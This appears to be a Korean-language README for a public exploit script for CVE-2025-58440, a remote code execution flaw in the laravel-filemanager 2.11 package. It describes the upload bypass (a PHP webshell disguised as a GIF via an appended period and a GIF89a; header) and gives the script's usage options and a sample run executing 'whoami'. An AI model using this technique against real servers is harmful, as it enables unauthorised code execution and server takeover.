
Laravel FileManager에서 Polyglot 파일 공격 및 Null Byte 삽입을 통한 원격 코드 실행(RCE)
Laravel FileManager에서 Polyglot 파일 공격과 Null Byte Injection을 통한 원격 코드 실행(RCE)
unisharp/laravel-filemanager 패키지 2.11 버전은 파일 업로드 시 부적절한 파일 유형 검증으로 인해 원격 코드 실행(RCE) 취약점에 노출됩니다. 이 취약점으로 인해 공격자는 파일 확장자 검증을 악용해 GIF 이미지로 위장한 악성 PHP 파일을 업로드할 수 있습니다. 구체적으로, 공격자는 .php 확장자에 마침표(.)를 추가하고 GIF89a; 헤더를 포함시켜 파일이 이미지처럼 보이게 만들어 검증 검사를 우회할 수 있습니다. 이로 인해 공격자는 서버에서 임의의 PHP 코드를 실행할 수 있으며, 이는 **원격 코드 실행(RCE)**으로 이어집니다.
python3 CVE-2025-58440.py <target> [--flags]
Laravel File Manager Exploit (CVE-2025-58440)
positional arguments:
target Target URL (e.g., 127.0.0.1:8000)
options:
-h, --help show this help message and exit
-C, --cookie COOKIE Session cookies
-d, --directory DIRECTORY Working directory (default: /tmp)
-f, --filename FILENAME Filename to upload (default: random)
-p, --payload COMMAND Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
